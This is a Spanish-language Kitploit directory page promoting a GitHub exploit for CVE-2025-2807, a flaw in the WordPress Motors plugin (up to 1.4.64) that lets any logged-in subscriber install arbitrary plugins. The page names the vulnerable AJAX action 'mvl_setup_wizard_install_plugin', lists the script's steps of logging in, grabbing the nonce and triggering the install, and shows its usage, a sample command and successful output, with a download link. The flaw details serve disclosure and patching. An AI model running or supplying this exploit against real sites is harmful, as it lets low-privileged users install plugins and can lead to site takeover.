Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2807 — Wordpress - Motors Plugin <= 1.4.64 - Vulnerabilidad de instalación arbitraria de plugins | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-2807
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Motors Plugin <= 1.4.64 - Vulnerabilidad de instalación arbitraria de plugins

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-2807: Plugin Motors <= 1.4.64 - Vulnerabilidad de Instalación Arbitraria de Plugins

Exploit por: Nxploited | Khaled Alenazi


⚠️ Resumen de la Vulnerabilidad

Plugin: Motors (<= 1.4.64)
Tipo: Autorización faltante para la instalación arbitraria de plugins por usuarios autenticados (Suscriptor+)
Gravedad: 8.8 (CVSS v3)
Descubierto el: 07 de abril de 2025
VDP: No


🔥 Impacto del Exploit

Esta vulnerabilidad permite que cualquier usuario autenticado de WordPress (Suscriptor+) instale plugins arbitrarios sin ninguna comprobación de autorización adecuada.

Debido a la falta de validación de capacidades en la función mvl_setup_wizard_install_plugin, un usuario con privilegios bajos puede realizar acciones reservadas para administradores.

📅 Se espera que sea explotado masivamente debido a su simplicidad y su impacto crítico.


🚫 Detalles Técnicos

  • Endpoint vulnerable: /wp-admin/admin-ajax.php
  • Acción vulnerable: mvl_setup_wizard_install_plugin
  • Nivel de acceso requerido: Suscriptor+ (usuario con sesión iniciada)
  • Problema principal: Falta de current_user_can('install_plugins') o comprobación de capacidades similar

🚀 Script de Exploit (Python)

Este script:

  1. Inicia sesión como suscriptor
  2. Extrae el nonce requerido (del HTML o JS)
  3. Activa la llamada AJAX vulnerable para instalar un plugin de tu elección

📃 Uso

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 Ejemplo de Ejecución

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

Salida:

root@kitploit:~
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}

✨ Exploit por Nxploited (Khaled Alenazi)

Descargar herramienta